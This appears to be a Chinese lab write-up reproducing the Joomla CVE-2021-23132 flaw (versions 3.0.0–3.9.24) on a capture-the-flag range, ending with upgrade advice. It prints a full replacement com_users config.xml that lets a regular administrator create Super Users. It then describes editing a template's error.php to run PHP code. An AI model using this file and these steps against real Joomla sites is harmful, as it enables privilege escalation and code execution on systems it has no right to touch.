【漏洞复现 CVE-2021-23132】Joomla远程代码执行漏洞

0x01 描述

Joomla是一套知名的内容管理系统,其使用PHP语言和MySQL数据库开发,可以在Linux、Windows、MacOSX等各种不同的平台上运行。
在Joomla 3.0.0到3.9.24版本中,Joomla!的com_media组件配置允许被任意修改导致Web级别目录遍历,攻击者通过一系列操作,进一步会导致远程命令执行。

0x02 漏洞编号

CVE-2021-23132

0x03 漏洞等级

CVSS:7.5
威胁等级:高危

0x04 影响范围

3.0.0 <= Joomla! <= 3.9.24

0x05 公开POC

https://github.com/HoangKien1020/CVE-2021-23132

0x06 漏洞复现

环境搭建

使用VULFOCUS靶场,一键拉取镜像

以普通管理员身份登录系统。切换到“media”

点击“option”,修改Path to Files Folder路径为当前路径“./”
可以看到这里可以操作整个web目录下的文件夹及文件,实现了目录遍历。

在/administrator/components/com_users下,删除config.xml文件

并重新上传config.xml文件,内容如下

<?xml version="1.0" encoding="utf-8"?>
<!--
  Configuration form for Joomla's com_users component, as reproduced in this
  write-up: it is uploaded in place of the shipped
  administrator/components/com_users/config.xml after the com_media
  "Path to Files Folder" setting has been pointed at the web root ("./").
  The write-up then reports that a regular administrator is able to create a
  user in the Super User group. The two usergrouplist fields below
  (new_usertype, guest_usergroup) carry checksuperusergroup="0"; presumably
  that is the setting that matters, but confirm by diffing this file against
  the vendor-shipped copy rather than trusting this listing.
  From the defender's side, any modification of a form-definition XML under
  administrator/components/ is a strong integrity signal: restore the file
  from a trusted package, and review user-group assignments and new accounts
  created after the file's modification time.
-->
<config>
  <fieldset
    name="user_options"
    label="COM_USERS_CONFIG_USER_OPTIONS" >
    <field
      name="allowUserRegistration"
      type="radio"
      label="COM_USERS_CONFIG_FIELD_ALLOWREGISTRATION_LABEL"
      description="COM_USERS_CONFIG_FIELD_ALLOWREGISTRATION_DESC"
      class="btn-group btn-group-yesno"
      default="1"
      >
      <option value="1">JYES</option>
      <option value="0">JNO</option>
    </field>

    <field
      name="new_usertype"
      type="usergrouplist"
      label="COM_USERS_CONFIG_FIELD_NEW_USER_TYPE_LABEL"
      description="COM_USERS_CONFIG_FIELD_NEW_USER_TYPE_DESC"
      default="2"
      checksuperusergroup="0"
    />

    <field
      name="guest_usergroup"
      type="usergrouplist"
      label="COM_USERS_CONFIG_FIELD_GUEST_USER_GROUP_LABEL"
      description="COM_USERS_CONFIG_FIELD_GUEST_USER_GROUP_DESC"
      default="1"
      checksuperusergroup="0"
    />

    <field
      name="sendpassword"
      type="radio"
      label="COM_USERS_CONFIG_FIELD_SENDPASSWORD_LABEL"
      description="COM_USERS_CONFIG_FIELD_SENDPASSWORD_DESC"
      class="btn-group btn-group-yesno"
      default="1"
      >
      <option value="1">JYES</option>
      <option value="0">JNO</option>
    </field>

    <field
      name="useractivation"
      type="list"
      label="COM_USERS_CONFIG_FIELD_USERACTIVATION_LABEL"
      description="COM_USERS_CONFIG_FIELD_USERACTIVATION_DESC"
      default="0"
      >
      <option value="0">JNONE</option>
      <option value="1">COM_USERS_CONFIG_FIELD_USERACTIVATION_OPTION_SELFACTIVATION</option>
      <option value="2">COM_USERS_CONFIG_FIELD_USERACTIVATION_OPTION_ADMINACTIVATION</option>
    </field>

    <field
      name="mail_to_admin"
      type="radio"
      label="COM_USERS_CONFIG_FIELD_MAILTOADMIN_LABEL"
      description="COM_USERS_CONFIG_FIELD_MAILTOADMIN_DESC"
      class="btn-group btn-group-yesno"
      default="0"
      >
      <option value="1">JYES</option>
      <option value="0">JNO</option>
    </field>

    <field
      name="captcha"
      type="plugins"
      label="COM_USERS_CONFIG_FIELD_CAPTCHA_LABEL"
      description="COM_USERS_CONFIG_FIELD_CAPTCHA_DESC"
      folder="captcha"
      filter="cmd"
      useglobal="true"
      >
      <option value="0">JOPTION_DO_NOT_USE</option>
    </field>

    <field
      name="frontend_userparams"
      type="radio"
      label="COM_USERS_CONFIG_FIELD_FRONTEND_USERPARAMS_LABEL"
      description="COM_USERS_CONFIG_FIELD_FRONTEND_USERPARAMS_DESC"
      class="btn-group btn-group-yesno"
      default="1"
      >
      <option value="1">JSHOW</option>
      <option value="0">JHIDE</option>
    </field>

    <field
      name="site_language"
      type="radio"
      label="COM_USERS_CONFIG_FIELD_FRONTEND_LANG_LABEL"
      description="COM_USERS_CONFIG_FIELD_FRONTEND_LANG_DESC"
      class="btn-group btn-group-yesno"
      default="0"
      showon="frontend_userparams:1"
      >
      <option value="1">JSHOW</option>
      <option value="0">JHIDE</option>
    </field>

    <field
      name="change_login_name"
      type="radio"
      label="COM_USERS_CONFIG_FIELD_CHANGEUSERNAME_LABEL"
      description="COM_USERS_CONFIG_FIELD_CHANGEUSERNAME_DESC"
      class="btn-group btn-group-yesno"
      default="0"
      >
      <option value="1">JYES</option>
      <option value="0">JNO</option>
    </field>

  </fieldset>

  <fieldset
    name="domain_options"
    label="COM_USERS_CONFIG_DOMAIN_OPTIONS"
    >

    <field
      name="domains"
      type="subform"
      label="COM_USERS_CONFIG_FIELD_DOMAINS_LABEL"
      description="COM_USERS_CONFIG_FIELD_DOMAINS_DESC"
      multiple="true"
      layout="joomla.form.field.subform.repeatable-table"
      formsource="administrator/components/com_users/models/forms/config_domain.xml"
    />
  </fieldset>

  <fieldset
    name="password_options"
    label="COM_USERS_CONFIG_PASSWORD_OPTIONS" >
    <field
      name="reset_count"
      type="integer"
      label="COM_USERS_CONFIG_FIELD_FRONTEND_RESET_COUNT_LABEL"
      description="COM_USERS_CONFIG_FIELD_FRONTEND_RESET_COUNT_DESC"
      first="0"
      last="20"
      step="1"
      default="10"
    />

    <field
      name="reset_time"
      type="integer"
      label="COM_USERS_CONFIG_FIELD_FRONTEND_RESET_TIME_LABEL"
      description="COM_USERS_CONFIG_FIELD_FRONTEND_RESET_TIME_DESC"
      first="1"
      last="24"
      step="1"
      default="1"
    />

    <field
      name="minimum_length"
      type="integer"
      label="COM_USERS_CONFIG_FIELD_MINIMUM_PASSWORD_LENGTH"
      description="COM_USERS_CONFIG_FIELD_MINIMUM_PASSWORD_LENGTH_DESC"
      first="4"
      last="99"
      step="1"
      default="4"
    />

    <field
      name="minimum_integers"
      type="integer"
      label="COM_USERS_CONFIG_FIELD_MINIMUM_INTEGERS"
      description="COM_USERS_CONFIG_FIELD_MINIMUM_INTEGERS_DESC"
      first="0"
      last="98"
      step="1"
      default="0"
    />

    <field
      name="minimum_symbols"
      type="integer"
      label="COM_USERS_CONFIG_FIELD_MINIMUM_SYMBOLS"
      description="COM_USERS_CONFIG_FIELD_MINIMUM_SYMBOLS_DESC"
      first="0"
      last="98"
      step="1"
      default="0"
    />

    <field
      name="minimum_uppercase"
      type="integer"
      label="COM_USERS_CONFIG_FIELD_MINIMUM_UPPERCASE"
      description="COM_USERS_CONFIG_FIELD_MINIMUM_UPPERCASE_DESC"
      first="0"
      last="98"
      step="1"
      default="0"
    />

    <field
      name="minimum_lowercase"
      type="integer"
      label="COM_USERS_CONFIG_FIELD_MINIMUM_LOWERCASE"
      description="COM_USERS_CONFIG_FIELD_MINIMUM_LOWERCASE_DESC"
      first="0"
      last="98"
      step="1"
      default="0"
    />

  </fieldset>

  <fieldset
    name="user_notes_history"
    label="COM_USERS_CONFIG_FIELD_NOTES_HISTORY" >

    <field
      name="save_history"
      type="radio"
      label="JGLOBAL_SAVE_HISTORY_OPTIONS_LABEL"
      description="JGLOBAL_SAVE_HISTORY_OPTIONS_DESC"
      class="btn-group btn-group-yesno"
      default="0"
      >
      <option value="1">JYES</option>
      <option value="0">JNO</option>
    </field>

    <field
      name="history_limit"
      type="number"
      label="JGLOBAL_HISTORY_LIMIT_OPTIONS_LABEL"
      description="JGLOBAL_HISTORY_LIMIT_OPTIONS_DESC"
      filter="integer"
      default="5"
      showon="save_history:1"
    />

  </fieldset>

   <fieldset
    name="massmail"
    label="COM_USERS_MASS_MAIL"
    description="COM_USERS_MASS_MAIL_DESC">

    <field
       name="mailSubjectPrefix"
       type="text"
      label="COM_USERS_CONFIG_FIELD_SUBJECT_PREFIX_LABEL"
      description="COM_USERS_CONFIG_FIELD_SUBJECT_PREFIX_DESC"
    />

     <field
       name="mailBodySuffix"
      type="textarea"
      label="COM_USERS_CONFIG_FIELD_MAILBODY_SUFFIX_LABEL"
      description="COM_USERS_CONFIG_FIELD_MAILBODY_SUFFIX_DESC"
       rows="5"
       cols="30"
    />

  </fieldset>

  <fieldset
    name="debug"
    label="COM_USERS_DEBUG_LABEL"
    description="COM_USERS_DEBUG_DESC">

    <field
      name="debugUsers"
      type="radio"
      label="COM_USERS_DEBUG_USERS_LABEL"
      description="COM_USERS_DEBUG_USERS_DESC"
      class="btn-group btn-group-yesno"
      default="1"
      >
      <option value="1">JYES</option>
      <option value="0">JNO</option>
    </field>

    <field
      name="debugGroups"
      type="radio"
      label="COM_USERS_DEBUG_GROUPS_LABEL"
      description="COM_USERS_DEBUG_GROUPS_DESC"
      class="btn-group btn-group-yesno"
      default="1"
      >
      <option value="1">JYES</option>
      <option value="0">JNO</option>
    </field>

  </fieldset>

  <fieldset name="integration"
    label="JGLOBAL_INTEGRATION_LABEL"
    description="COM_USERS_CONFIG_INTEGRATION_SETTINGS_DESC"
  >

    <field
      name="integration_sef"
      type="note"
      label="JGLOBAL_SEF_TITLE"
    />

    <field
      name="sef_advanced"
      type="radio"
      class="btn-group btn-group-yesno btn-group-reversed"
      default="0"
      label="JGLOBAL_SEF_ADVANCED_LABEL"
      description="JGLOBAL_SEF_ADVANCED_DESC"
      filter="integer"
      >
      <option value="0">JGLOBAL_SEF_ADVANCED_LEGACY</option>
      <option value="1">JGLOBAL_SEF_ADVANCED_MODERN</option>
    </field>

    <field
      name="integration_customfields"
      type="note"
      label="JGLOBAL_FIELDS_TITLE"
    />

    <field
      name="custom_fields_enable"
      type="radio"
      label="JGLOBAL_CUSTOM_FIELDS_ENABLE_LABEL"
      description="JGLOBAL_CUSTOM_FIELDS_ENABLE_DESC"
      class="btn-group btn-group-yesno"
      default="1"
      >
      <option value="1">JYES</option>
      <option value="0">JNO</option>
    </field>

  </fieldset>

  <fieldset
    name="permissions"
    label="JCONFIG_PERMISSIONS_LABEL"
    description="JCONFIG_PERMISSIONS_DESC"
    >

    <field
      name="rules"
      type="rules"
      label="JCONFIG_PERMISSIONS_LABEL"
      filter="rules"
      validate="rules"
      component="com_users"
      section="component"
    />

  </fieldset>
</config>

添加新用户,可以看到,能直接添加超级管理员权限的用户

使用超级管理员用户,修改Beez3模板的error.php文件
添加语句phpinfo();

访问http://localhost/templates/beez3/error.php,实现代码执行

也可以使用POC来执行代码

获取Flag

0x07 修复建议

建议相关用户升级到3.9.25及以上版本。或者登录系统后台,系统会提示升级,点击一下完成自动升级即可。
